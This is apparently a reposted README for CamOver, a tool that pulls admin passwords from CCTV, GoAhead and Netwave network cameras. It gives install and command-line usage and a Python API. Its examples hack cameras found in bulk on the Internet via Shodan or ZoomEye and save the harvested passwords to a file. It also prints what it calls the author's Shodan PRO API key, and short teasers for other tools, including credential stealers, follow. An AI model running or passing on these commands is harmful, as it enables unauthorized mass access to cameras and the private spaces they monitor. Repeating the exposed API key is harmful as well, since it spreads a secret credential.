CamOver is a camera exploitation tool that allows to disclosure network camera admin password.
Features
CCTV
, GoAhead
and Netwave
.Installation
pip3 install git+https://github.com/EntySec/CamOver
Basic Usage
To use it just type camover
in your terminal.
usage: camover [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [–shodan SHODAN]
[–zoomeye ZOOMEYE] [-p PAGES]
CamOver is a camera exploitation tool that allows to disclosure network camera
admin password.
optional arguments:
-h, –help show this help message and exit
-t, –threads Use threads for fastest work.
-o OUTPUT, –output OUTPUT
Output result to file.
-i INPUT, –input INPUT
Input file of addresses.
-a ADDRESS, –address ADDRESS
Single address.
–shodan SHODAN Shodan API key for exploiting devices over Internet.
–zoomeye ZOOMEYE ZoomEye API key for exploiting devices over Internet.
-p PAGES, –pages PAGES
Number of pages you want to get from ZoomEye.
Examples
Exploiting single camera
Let’s hack my camera just for fun.
camover -a 192.168.99.100
Exploiting cameras from Internet
Let’s try to use Shodan search engine to exploit cameras over Internet, we will use it with -t
for fast exploitation.
camover -t –shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
NOTE: Given Shodan API key (PSKINdQe1GyxGgecYz2191H2JoS9qvgD
) is my PRO API key, you can use this key or your own, be free to use all our resources for free 🙂
Exploiting cameras from input file
Let’s try to use opened database of cameras with -t
for fast exploitation.
camover -t -i cameras.txt -o passwords.txt
NOTE: It will exploit all cameras in cameras.txt
list by their addresses and save all obtained passwords to passwords.txt
.
API Usage
CamOver also has their own Python API that can be invoked by importing CamOver to your code.
from camover import CamOver
Basic functions
There are all CamOver basic functions that can be used to exploit specified camera.
exploit(address)
– Exploit single camera by given address.
Examples
Exploiting single camera
from camover import CamOver
camover = CamOver()
creds = camover.exploit(‘192.168.99.100’)
print(creds)
Playwright-MCP (Model Context Protocol) is a cutting-edge tool designed to bridge the gap between AI…
JBDev is a specialized development tool designed to streamline the creation and debugging of jailbreak…
The Kereva LLM Code Scanner is an innovative static analysis tool tailored for Python applications…
Nuclei-Templates-Labs is a dynamic and comprehensive repository designed for security researchers, learners, and organizations to…
SSH-Stealer and RunAs-Stealer are malicious tools designed to stealthily harvest SSH credentials, enabling attackers to…
Control flow flattening is a common obfuscation technique used by OLLVM (Obfuscator-LLVM) to transform executable…